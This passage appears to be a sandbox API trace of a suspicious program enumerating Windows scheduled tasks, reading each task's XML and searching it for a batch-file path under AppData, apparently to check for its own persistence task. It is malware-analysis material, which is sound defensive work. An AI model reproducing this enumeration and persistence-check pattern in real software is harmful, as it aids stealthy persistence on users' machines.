This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.494] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.494] IUnknown:Release (This=0x929460) returned 0x0 [0162.494] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.494] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x47, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.494] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.494] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.494] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.494] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="ResolutionHost") returned 0x0 [0162.494] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n \\Microsoft\\Windows\\WDI\\ResolutionHost\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1}\r\n \r\n \r\n") returned 0x0 [0162.495] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n \\Microsoft\\Windows\\WDI\\ResolutionHost\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.495] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.495] IUnknown:Release (This=0x929460) returned 0x0 [0162.495] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.495] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.496] IUnknown:Release (This=0x929460) returned 0x0 [0162.496] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.496] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x48, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.496] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929490) returned 0x0 [0162.496] IRegisteredTaskCollection:get_Count (in: This=0x929490, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.496] IUnknown:Release (This=0x929490) returned 0x0 [0162.496] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929490) returned 0x0 [0162.496] ITaskFolderCollection:get_Count (in: This=0x929490, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.496] IUnknown:Release (This=0x929490) returned 0x0 [0162.496] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.496] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x49, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.497] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.497] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0162.497] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.497] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Windows Defender Cache Maintenance") returned 0x0 [0162.497] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41126)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdCacheMaintenance\r\n \r\n \r\n") returned 0x0 [0162.498] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41126)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdCacheMaintenance\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.498] IUnknown:Release (This=0x929600) returned 0x0 [0162.498] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.498] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Windows Defender Cleanup") returned 0x0 [0162.498] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41124)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdCleanup\r\n \r\n \r\n") returned 0x0 [0162.499] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41124)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdCleanup\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.499] IUnknown:Release (This=0x929600) returned 0x0 [0162.499] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.499] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Windows Defender Scheduled Scan") returned 0x0 [0162.499] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41127)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n Scan -ScheduleJob\r\n \r\n \r\n") returned 0x0 [0162.499] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41127)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n Scan -ScheduleJob\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.499] IUnknown:Release (This=0x929600) returned 0x0 [0162.500] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.500] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Windows Defender Verification") returned 0x0 [0162.500] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41125)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1DT1H\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdVerification\r\n \r\n \r\n") returned 0x0 [0162.500] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Windows Defender\\MpAsDesc.dll,-41125)\r\n \\Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1DT1H\r\n \r\n \r\n \r\n \r\n \r\n %ProgramFiles%\\Windows Defender\\MpCmdRun.exe\r\n -IdleTask -TaskName WdVerification\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.500] IUnknown:Release (This=0x929600) returned 0x0 [0162.500] IUnknown:Release (This=0x929470) returned 0x0 [0162.500] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.501] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.501] IUnknown:Release (This=0x929470) returned 0x0 [0162.501] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.501] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4a, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.501] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.501] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.501] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.501] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="QueueReporting") returned 0x0 [0162.501] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.5\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n PT4H\r\n IgnoreNew\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT3M\r\n \r\n \r\n 7510BCA33A0B9441\r\n 01\r\n \r\n \r\n 2015-01-01T02:00:00+02:00\r\n \r\n PT4H\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -upload\r\n \r\n \r\n") returned 0x0 [0162.502] StrStrIW (lpFirst="\r\n\r\n \r\n 1.5\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n PT4H\r\n IgnoreNew\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT3M\r\n \r\n \r\n 7510BCA33A0B9441\r\n 01\r\n \r\n \r\n 2015-01-01T02:00:00+02:00\r\n \r\n PT4H\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -upload\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.503] IUnknown:Release (This=0x929620) returned 0x0 [0162.503] IUnknown:Release (This=0x929480) returned 0x0 [0162.503] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.503] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.503] IUnknown:Release (This=0x929480) returned 0x0 [0162.503] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.503] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4b, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.503] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929490) returned 0x0 [0162.503] IRegisteredTaskCollection:get_Count (in: This=0x929490, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.503] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.503] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="BfeOnServiceStartTypeChange") returned 0x0 [0162.504] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n") returned 0x0 [0162.504] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.504] IUnknown:Release (This=0x929630) returned 0x0 [0162.504] IUnknown:Release (This=0x929490) returned 0x0 [0162.504] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929490) returned 0x0 [0162.505] ITaskFolderCollection:get_Count (in: This=0x929490, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.505] IUnknown:Release (This=0x929490) returned 0x0 [0162.505] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.505] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4c, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.505] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.505] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.505] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.505] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="UpdateLibrary") returned 0x0 [0162.505] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n \\Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n") returned 0x0 [0162.506] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n \\Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.506] IUnknown:Release (This=0x929620) returned 0x0 [0162.506] IUnknown:Release (This=0x929480) returned 0x0 [0162.506] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.506] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.506] IUnknown:Release (This=0x929480) returned 0x0 [0162.507] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.507] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4d, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.507] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.507] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.507] IUnknown:Release (This=0x929470) returned 0x0 [0162.507] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.507] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.507] IUnknown:Release (This=0x929470) returned 0x0 [0162.507] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.507] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4e, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.507] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.508] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.508] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.508] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Calibration Loader") returned 0x0 [0162.508] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n ConsoleConnect\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490D-9576-9E20CDBC20BD}\r\n \r\n \r\n") returned 0x0 [0162.509] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n ConsoleConnect\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490D-9576-9E20CDBC20BD}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.509] IUnknown:Release (This=0x929610) returned 0x0 [0162.509] IUnknown:Release (This=0x929480) returned 0x0 [0162.509] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.510] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.510] IUnknown:Release (This=0x929480) returned 0x0 [0162.510] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.510] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4f, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.510] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.510] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0162.510] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.510] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Automatic App Update") returned 0x0 [0162.510] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-601)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-601)\r\n 